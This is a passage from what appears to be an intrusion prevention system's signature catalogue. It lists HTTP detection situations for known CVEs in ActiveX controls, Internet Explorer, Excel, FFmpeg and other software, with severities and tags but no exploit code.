Tags: Windows, Any Hardware, E-Book Systems FlipViewer, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: E-Book-Systems-FlipViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

HTTP_SS-EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method

About this situation: Attempt to exploit a vulnerability in EDraw Office Viewer ActiveX component detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, EDraw Office Viewer, CVE2007, Windows not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
Description:
Back to top

HTTP_SS-EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call

About this situation: A call to a vulnerable method in EDraw Office Viewer ActiveX control was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EDraw Office Viewer, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: EDraw-Office-Viewer-OpenWebFile-Arbitrary-Program-Execution
Description:
Back to top

HTTP_SS-EICAR-AntiVirus-Test-File

About this situation: Detected an EICAR antivirus test file
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

HTTP_SS-Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Electronic Arts SnoopyCtrl ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Electronic Arts SnoopyCtrl, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Electronic-Arts-SnoopyCtrl-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

HTTP_SS-Embedded-ActiveX-Object-In-HTML

About this situation: Detected an embedded ActiveX object in HTML
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-336-4219
Vulnerability: Embedded-Object-In-HTML
Description:
Back to top

HTTP_SS-Embedded-Java-Applet-In-HTML

About this situation: Detected an embedded Java applet in HTML
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-402-4219
Vulnerability: Embedded-Object-In-HTML
Description:
Back to top

HTTP_SS-EMC-Captiva-PixTools-ActiveX-Control-File-Creation

About this situation: An attempt to exploit a vulnerability in EMC Captiva PixTools detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC Captiva PixTools, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: EMC-Captiva-PixTools-Distributed-Imaging-ActiveX-Control-File-Creation
Description:
Back to top

HTTP_SS-EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC QuickScan Pro detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC Captiva QuickScan Pro, EMC Documentum ApplicationXtender Desktop, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Encoded-Client-Side-Script

About this situation: Detected a web page with encoded scripts
Context: HTTP Server Stream
Severity: 1
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: HTML-Script-Detector
Description:
Back to top

HTTP_SS-Encoded-JavaScript-In-PDF

About this situation: Encoded JavaScript in PDF detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Encoded-JavaScript-Tag-In-PDF
Description:
Back to top

HTTP_SS-Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ESTSoft ALZip detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ESTSoft ALZip, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
Description:
Back to top

HTTP_SS-Excel-Memory-Corruption-CVE-2010-0823

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0823 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-312-4219
Vulnerability: Excel-Memory-Corruption-CVE-2010-0823
Description:
Back to top

HTTP_SS-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Facebook Photo Uploader, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
Description:
Back to top

HTTP_SS-FFmpeg-OGV-File-Format-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in FFmpeg over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: FFmpeg-OGV-File-Format-Memory-Corruption
Description:
Back to top

HTTP_SS-FFmpeg-Vmd_Read_Header-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in FFmpeg Project Team FFmpeg detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, FFmpeg Project Team FFmpeg, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: FFmpeg-Vmd_Read_Header-Integer-Overflow
Description:
Back to top

HTTP_SS-Firefox-Browser-XUL-Frame-Tree-Memory-Corruption

About this situation: Attempt to exploit buffer overflow vulnerability in Firefox browser detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Firefox-Browser-XUL-Frame-Tree-Validation-Vulnerability
Description:
Back to top

HTTP_SS-Firefox-Gif-Netscape-Extension-BOF

About this situation: Invalid Netscape specific extension in a GIF image
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Firefox-Gif-Netscape-Extension-BOF
Description:
Back to top

HTTP_SS-Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in Free Download Manager.ORG Free Download Manager (FDM) detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Free Download Manager, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-388-4219
Vulnerability: Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Libxslt Libxslt detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libxslt, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
Description:
Back to top

HTTP_SS-GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GOM Player ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Gretech Online Movie Player, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Google-Apps-Mailto-URI-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Google Apps detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Google Apps, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-354-4219
Vulnerability: Google-Apps-Mailto-URI-Argument-Injection
Description:
Back to top

HTTP_SS-Google-Chrome-CRX-Extension-Package-Download

About this situation: Detected a download attempt of an executable content
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: Google-Chrome-Extension-Package
Description:
Back to top

HTTP_SS-Google-Chrome-GURL-Cross-Origin-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, CVE2010, Any Operating System not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-316-4219
Last changed: sgpkg-ips-316-4219
Vulnerability: Google-Chrome-GURL-Cross-Origin-Bypass
Description:
Back to top

HTTP_SS-Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Green Dam Youth Escort detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Green Dam Youth Escort, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Gzip-Compressed-File-Download

About this situation: Attempt to download gzip compressed file detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Gzip-Compressed-File
File-Type-Identification
Description:
Back to top

HTTP_SS-HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ActiveX control distributed with HP products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, x86, HP All-in-One Series, HP Photo & Imaging Gallery, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-123-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Windows-MFC-Library-FileFind-Class-Heap-Overflow
Description:
Back to top

HTTP_SS-HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal

About this situation: An attempt to exploit path traversal vulnerability in HP Info Center
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, HP Info Center, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
Description:
Back to top

HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access

About this situation: An attempt to access registry using vulnerability in Hewlett-Packard Info Center was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, HP Info Center, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HP-Info-Center-ActiveX-Control-Registry-Set
HP-Info-Center-ActiveX-Control-Registry-Get
Description:
Back to top

HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, HP LoadRunner, Windows not specific, HP LoadRunner not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
Description:
Back to top

HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, HP LoadRunner, CVE2007, Windows not specific, HP LoadRunner not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Mercury Quality Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, HP Mercury Quality Control, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in HP Software Update detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, HP Software Update, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-HTML-Null-Character-Evasion-Method

About this situation: Detected an evasion attempt
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: HTML-Null-Character-Evasion-Method
Description:
Back to top

HTTP_SS-IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Access Support ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, IBM Access Support ActiveX Control, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Client SDK detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Connect, IBM Informix Client SDK, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-IBM-Installation-Manager-IIM-URI-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM Installation Manager detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, IBM Rational Robot, IBM Rational Team Concert Standard Edition, IBM Installation Manager, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
Description:
Back to top

HTTP_SS-IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino Web Access detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Domino Web Access, Lotus Domino, CVE2007, Windows not specific, Lotus Domino not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-359-4219
Vulnerability: IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution

About this situation: Attempt to exploit a command injection vulnerability in IBM Lotus Expeditor detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: HTTP-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
Description:
Back to top

HTTP_SS-IDAutomation-Barcode-ActiveX-Components-File-Write

About this situation: Detected an attempt to exploit a vulnerability in IDAutomation ActiveX components
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, IDAutomation Barcode ActiveX, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: IDAutomation-Barcode-ActiveX-Components-File-Write
Description:
Back to top

HTTP_SS-Indexing-Service-Memory-Corruption-CVE-2009-2507

About this situation: An attempt to exploit a remote code execution vulnerability in the Indexing Service on Windows systems detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-258-3038
Vulnerability: Indexing-Service-Memory-Corruption-CVE-2009-2507
Description:
Back to top

HTTP_SS-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811

About this situation: An attempt to exploit a code execution vulnerability in in the Microsoft Internet Explorer 8 Developer Tools detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2010-06, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-310-4219
Vulnerability: Microsoft-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811
Description:
Back to top

HTTP_SS-Internet-Explorer-Cached-Objects-Zone-Bypass

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, Internet Explorer 5.5, MS2002, CVE2002, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-720-5211
Vulnerability: Internet-Explorer-Cached-Objects-Zone-Bypass
Description:
Back to top

HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-2

About this situation: Detected attempt to exploit Microsoft Internet Explorer createTextRange vulnerability
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-419-4219
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-3

About this situation: Detected attempt to exploit Microsoft Internet Explorer createTextRange vulnerability
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-369-4219
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

HTTP_SS-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-11, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-262-3038
Vulnerability: HTTP-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
Description:
Back to top

HTTP_SS-Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2007-12, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
Description:
Back to top

HTTP_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow

About this situation: Attempt to exploit HTML Elements Buffer Overflow in Internet Explorerer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2004-12, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-925-5242
Vulnerability: MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040
Description:
Back to top

HTTP_SS-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-02, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-144-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-02, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-354-4219
Vulnerability: HTTP_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
Description:
Back to top

HTTP_SS-Internet-Explorer-Object-Tag-Popup

About this situation: Attempt to bypass object type checks via popup in Internet Explorer was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 4.0, Internet Explorer 5.5, MS2003, CVE2003, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-267-3038
Vulnerability: Microsoft-Internet-Explorer-Object-Tag-Popup
Description:
Back to top

HTTP_SS-Internet-Explorer-Object-Type-Open-Window

About this situation: Attempt to bypass object type checks via open window in Internet Explorer was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 4.0, Internet Explorer 5.5, MS2003, CVE2003, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-267-3038
Vulnerability: Microsoft-Internet-Explorer-Object-Tag-Popup
Description:
Back to top

HTTP_SS-Internet-Explorer-Scroll-Event-Remote-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
